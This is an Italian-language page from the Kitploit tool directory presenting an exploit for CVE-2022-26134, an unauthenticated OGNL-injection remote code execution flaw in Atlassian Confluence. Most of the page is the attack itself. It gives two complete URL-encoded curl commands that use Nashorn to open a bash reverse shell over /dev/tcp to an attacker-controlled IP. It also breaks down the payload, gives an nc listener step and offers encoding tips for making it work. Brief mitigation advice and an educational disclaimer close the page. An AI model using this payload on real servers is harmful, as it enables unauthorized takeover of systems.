Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/khalidhaimur/cve-2022-26134
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneStrumento di Accesso Remoto
GitHubkhalidhaimur/cve-2022-26134

CVE-2022-26134

Sfruttamento attivo dell'app Questions for Confluence di Atlassian CVE-2022-26134

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Sfruttamento attivo di Confluence CVE-2022-26134

Panoramica

CVE-2022-26134 è una vulnerabilità critica di Esecuzione di codice in remoto (RCE) che colpisce Atlassian Confluence. Questa vulnerabilità consente ad attaccanti non autenticati di eseguire codice arbitrario iniettando espressioni OGNL negli endpoint vulnerabili.

Versioni interessate

  • Tutte le versioni supportate di Atlassian Confluence Server e Data Center precedenti alla release con patch.

Dettagli dello sfruttamento

Il seguente comando CURL dimostra lo sfruttamento attivo di questa vulnerabilità, utilizzando il motore Nashorn di Java per eseguire una reverse shell:

root@kitploit:~
curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/

Quando si apportano queste modifiche, bisogna anche tenere conto della codifica URL. La stringa del payload nel proof-of-concept non è completamente codificata in URL. Alcuni caratteri (in particolare ".", "-" e "/") non sono codificati. Anche se non è sempre così, per questo exploit ciò risulta importante per il funzionamento del payload. Se uno qualsiasi di questi caratteri viene codificato, il server analizzerà l'URL in modo diverso e il payload potrebbe non essere eseguito. Questo significa che non possiamo applicare la codifica URL all'intero payload dopo averlo modificato.

curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.118.4/4444%200%3E%261%27%29.start%28%29%22%29%7D/

Scomposizione del Payload

  1. ${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval(...)}
    • Utilizza il motore script Java Nashorn per valutare un'espressione OGNL.
  2. new java.lang.ProcessBuilder().command('bash','-c','bash -i > /dev/tcp/10.0.0.28/1270 0>&1').start()
    • Avvia una reverse shell che si riconnette a 10.0.0.28:1270.

Fasi di Sfruttamento

  1. Configura un listener sulla tua macchina attaccante:
    root@kitploit:~
    nc -lvnp 1270
    
  2. Esegui il comando CURL per lo sfruttamento.
  3. Se lo sfruttamento va a buon fine, riceverai una reverse shell.

Mitigazione

  • Atlassian ha rilasciato patch di sicurezza per le versioni interessate. Si consiglia vivamente di aggiornare immediatamente all'ultima versione.
  • Limita l'accesso ai server Confluence da fonti non attendibili.
  • Monitora i log per individuare richieste sospette contenenti espressioni OGNL.

Riferimenti

  • Avviso di sicurezza Atlassian
  • Dettagli CVE-2022-26134

Disclaimer

Questa documentazione è solo a scopo didattico. Lo sfruttamento non autorizzato dei sistemi è illegale e può comportare gravi conseguenze. Ottieni sempre la dovuta autorizzazione prima di condurre valutazioni di sicurezza.

Scarica lo strumento